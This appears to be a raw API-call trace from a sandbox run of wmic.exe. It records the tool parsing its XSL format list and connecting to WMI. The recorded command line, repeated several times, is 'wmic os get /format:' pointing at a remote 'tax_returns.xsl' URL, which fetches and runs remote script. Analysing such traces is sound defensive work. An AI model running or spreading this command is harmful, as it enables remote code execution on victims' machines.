	[0050.180] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0
	[0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0050.181] SysStringLen (param_1="TABLE") returned 0x5
	[0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0050.181] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0050.181] SysStringLen (param_1="XML") returned 0x3
	[0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0050.181] SysStringLen (param_1="texttablewsys") returned 0xd
	[0050.181] SysStringLen (param_1="XML") returned 0x3
	[0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0050.181] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.181] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.181] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.181] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=16, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.181] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="htable.xsl") returned 0x0
	[0050.181] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.181] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.181] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0
	[0050.181] SysStringLen (param_1="htable-sortby") returned 0xd
	[0050.181] SysStringLen (param_1="TABLE") returned 0x5
	[0050.181] SysStringLen (param_1="htable-sortby") returned 0xd
	[0050.181] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.181] SysStringLen (param_1="htable-sortby") returned 0xd
	[0050.181] SysStringLen (param_1="XML") returned 0x3
	[0050.181] SysStringLen (param_1="htable-sortby") returned 0xd
	[0050.181] SysStringLen (param_1="texttablewsys") returned 0xd
	[0050.181] SysStringLen (param_1="htable-sortby") returned 0xd
	[0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0050.181] SysStringLen (param_1="XML") returned 0x3
	[0050.181] SysStringLen (param_1="htable-sortby") returned 0xd
	[0050.181] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.181] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.182] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.182] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=17, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.182] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="mof.xsl") returned 0x0
	[0050.182] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.182] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.182] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0
	[0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0050.182] SysStringLen (param_1="TABLE") returned 0x5
	[0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0050.182] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0050.182] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0050.182] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0050.182] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0050.182] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.182] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.182] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.182] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=18, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.182] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="mof.xsl") returned 0x0
	[0050.182] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.182] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.183] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0
	[0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0050.183] SysStringLen (param_1="TABLE") returned 0x5
	[0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0050.183] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0050.183] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0050.183] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0050.183] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0050.183] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0050.183] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.183] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.183] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.183] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=19, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.183] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="textvaluelist.xsl") returned 0x0
	[0050.183] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.183] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.183] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0
	[0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0050.183] SysStringLen (param_1="TABLE") returned 0x5
	[0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0050.183] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0050.183] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0050.183] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.183] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0050.184] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.184] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.184] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.184] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=20, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.184] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="textvaluelist.xsl") returned 0x0
	[0050.184] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.184] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.184] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0
	[0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0050.184] SysStringLen (param_1="TABLE") returned 0x5
	[0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0050.184] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0050.184] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0050.184] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0050.184] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0050.184] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0050.184] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.184] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.184] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.184] IUnknown:Release (This=0x233e1a2ca30) returned 0x0
	[0050.184] IUnknown:Release (This=0x233e1a294a0) returned 0x1
	[0050.184] FreeThreadedDOMDocument:IUnknown:Release (This=0x233e1a26f20) returned 0x0
	[0050.184] GetCommandLineW () returned="wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	[0050.185] memcpy_s (in: _Destination=0x233e14f8930, _DestinationSize=0x8e, _Source=0x233e1211a4c, _SourceSize=0x82 | out: _Destination=0x233e14f8930) returned 0x0
	[0050.185] GetLocalTime (in: lpSystemTime=0x350027f6f0 | out: lpSystemTime=0x350027f6f0*(wYear=0x7e2, wMonth=0x6, wDayOfWeek=0x2, wDay=0x1a, wHour=0x16, wMinute=0x3b, wSecond=0x5, wMilliseconds=0x3e0)) 
	[0050.186] _vsnwprintf (in: _Buffer=0x233e14f80e0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x350027f598 | out: _Buffer="06-26-2018T22:59:05") returned 19
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="os") returned 2
	[0050.186] _wcsicmp (_String1="os", _String2="\"NULL\"") returned 77
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="get") returned 3
	[0050.186] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69
	[0050.186] memmove_s (in: _Destination=0x233e14fb170, _DestinationSize=0x8, _Source=0x233e14fb8d0, _SourceSize=0x8 | out: _Destination=0x233e14fb170) returned 0x0
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="/") returned 1
	[0050.186] memmove_s (in: _Destination=0x233e14fb430, _DestinationSize=0x10, _Source=0x233e14fb170, _SourceSize=0x10 | out: _Destination=0x233e14fb430) returned 0x0
	[0050.186] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.186] lstrlenW (lpString="ASSOC") returned 5
	[0050.186] lstrlenW (lpString="format") returned 6
	[0050.186] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0050.186] lstrlenW (lpString="FORMAT") returned 6
	[0050.186] lstrlenW (lpString="format") returned 6
	[0050.186] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2
	[0050.186] lstrlenW (lpString="/") returned 1
	[0050.186] lstrlenW (lpString="/") returned 1
	[0050.186] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
	[0050.186] lstrlenW (lpString="format") returned 6
	[0050.186] _wcsicmp (_String1="format", _String2="\"NULL\"") returned 68
	[0050.186] lstrlenW (lpString="format") returned 6
	[0050.186] memmove_s (in: _Destination=0x233e14fb980, _DestinationSize=0x18, _Source=0x233e14fb430, _SourceSize=0x18 | out: _Destination=0x233e14fb980) returned 0x0
	[0050.186] memmove_s (in: _Destination=0x233e14f72e0, _DestinationSize=0x20, _Source=0x233e14fb980, _SourceSize=0x20 | out: _Destination=0x233e14f72e0) returned 0x0
	[0050.186] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43
	[0050.187] _wcsicmp (_String1="\"https://itaxkenya.com/kra/tax_returns.xsl\"", _String2="\"NULL\"") returned -6
	[0050.187] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43
	[0050.187] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43
	[0050.187] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0050.187] lstrlenW (lpString="QUIT") returned 4
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="QUIT", cchCount2=4) returned 1
	[0050.187] lstrlenW (lpString="EXIT") returned 4
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="EXIT", cchCount2=4) returned 3
	[0050.187] WbemLocator:IUnknown:AddRef (This=0x233e12241d0) returned 0x2
	[0050.187] lstrlenW (lpString="/") returned 1
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="/", cchCount2=1) returned 3
	[0050.187] lstrlenW (lpString="-") returned 1
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="-", cchCount2=1) returned 3
	[0050.187] lstrlenW (lpString="CLASS") returned 5
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CLASS", cchCount2=5) returned 3
	[0050.187] lstrlenW (lpString="PATH") returned 4
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="PATH", cchCount2=4) returned 1
	[0050.187] lstrlenW (lpString="CONTEXT") returned 7
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CONTEXT", cchCount2=7) returned 3
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] lstrlenW (lpString="os") returned 2
	[0050.187] GetCurrentThreadId () returned 0xdf0
	[0050.187] ??0CHString@@QEAA@XZ () returned 0x350027f450
	[0050.187] WbemLocator:IWbemLocator:ConnectServer (in: This=0x233e12241d0, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da898 | out: ppNamespace=0x7ff66e6da898*=0x233e1287c80) returned 0x0
	[0050.554] CoSetProxyBlanket (pProxy=0x233e1287c80, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0050.554] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.554] GetCurrentThreadId () returned 0xdf0
	[0050.554] ??0CHString@@QEAA@XZ () returned 0x350027f2e8
	[0050.555] SysStringLen (param_1="root\\cli") returned 0x8
	[0050.555] SysStringLen (param_1="\\") returned 0x1
	[0050.555] SysStringLen (param_1="root\\cli\\") returned 0x9
	[0050.555] SysStringLen (param_1="ms_409") returned 0x6
	[0050.555] WbemLocator:IWbemLocator:ConnectServer (in: This=0x233e12241d0, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da8a0 | out: ppNamespace=0x7ff66e6da8a0*=0x233e1292640) returned 0x0
	[0050.615] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.615] GetCurrentThreadId () returned 0xdf0
	[0050.615] ??0CHString@@QEAA@XZ () returned 0x350027f468
	[0050.615] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
	[0050.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bdbc0, cbMultiByte=-1, lpWideCharStr=0x233e14fb930, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
	[0050.615] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
	[0050.615] SysStringLen (param_1="os") returned 0x2
	[0050.615] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e
	[0050.616] SysStringLen (param_1="'") returned 0x1
	[0050.616] IWbemServices:GetObject (in: This=0x233e1287c80, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0x350027f380*=0x0, ppCallResult=0x0 | out: ppObject=0x350027f380*=0x233e12748a0, ppCallResult=0x0) returned 0x0
	[0050.631] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="Target", lFlags=0, pVal=0x350027f398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f398*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_OperatingSystem", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.631] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
	[0050.631] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
	[0050.631] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="PWhere", lFlags=0, pVal=0x350027f398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f398*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.631] lstrlenW (lpString="") returned 0
	[0050.631] lstrlenW (lpString="") returned 0
	[0050.631] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="Connection", lFlags=0, pVal=0x350027f398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f398*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12b4830, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.631] IUnknown:QueryInterface (in: This=0x233e12b4830, riid=0x7ff66e6c34f8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350027f388 | out: ppvObject=0x350027f388*=0x233e12b4830) returned 0x0
	[0050.631] GetCurrentThreadId () returned 0xdf0
	[0050.631] ??0CHString@@QEAA@XZ () returned 0x350027f298
	[0050.631] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Namespace", lFlags=0, pVal=0x350027f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.631] lstrlenW (lpString="ROOT\\CIMV2") returned 10
	[0050.631] lstrlenW (lpString="ROOT\\CIMV2") returned 10
	[0050.631] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Locale", lFlags=0, pVal=0x350027f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e888, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.632] lstrlenW (lpString="ms_409") returned 6
	[0050.632] lstrlenW (lpString="ms_409") returned 6
	[0050.632] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="User", lFlags=0, pVal=0x350027f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e888, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.632] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Password", lFlags=0, pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.632] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Server", lFlags=0, pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.632] lstrlenW (lpString=".") returned 1
	[0050.632] lstrlenW (lpString=".") returned 1
	[0050.632] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Authority", lFlags=0, pVal=0x350027f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e888, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.632] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.632] IUnknown:Release (This=0x233e12b4830) returned 0x1
	[0050.632] GetCurrentThreadId () returned 0xdf0
	[0050.632] ??0CHString@@QEAA@XZ () returned 0x350027f298
	[0050.632] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="__RELPATH", lFlags=0, pVal=0x350027f2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"OS\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.632] GetCurrentThreadId () returned 0xdf0
	[0050.632] ??0CHString@@QEAA@XZ () returned 0x350027f160
	[0050.632] ??0CHString@@QEAA@PEBG@Z () returned 0x350027f180
	[0050.633] ??0CHString@@QEAA@AEBV0@@Z () returned 0x350027f0f8
	[0050.633] ?Empty@CHString@@QEAAXXZ () returned 0x7ffbfe19627c
	[0050.633] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x233e14fbc40
	[0050.633] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b
	[0050.633] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x350027f108
	[0050.633] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x350027f100
	[0050.633] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x350027f180
	[0050.633] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.633] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.633] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x350027f0d0
	[0050.633] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x350027f0f8
	[0050.633] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.633] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x233e14fb670
	[0050.633] ?Find@CHString@@QEBAHPEBG@Z () returned 0x2
	[0050.633] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x350027f108
	[0050.633] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x350027f100
	[0050.633] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x350027f180
	[0050.633] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.633] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.633] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x350027f0d0
	[0050.633] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x350027f0f8
	[0050.633] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.633] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7ffbfe196270
	[0050.633] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.633] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
	[0050.633] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
	[0050.634] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
	[0050.634] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x21
	[0050.634] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x74
	[0050.634] SysStringLen (param_1="\"") returned 0x1
	[0050.634] IWbemServices:GetObject (in: This=0x233e1292640, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x350027f150*=0x0, ppCallResult=0x0 | out: ppObject=0x350027f150*=0x233e12b4830, ppCallResult=0x0) returned 0x0
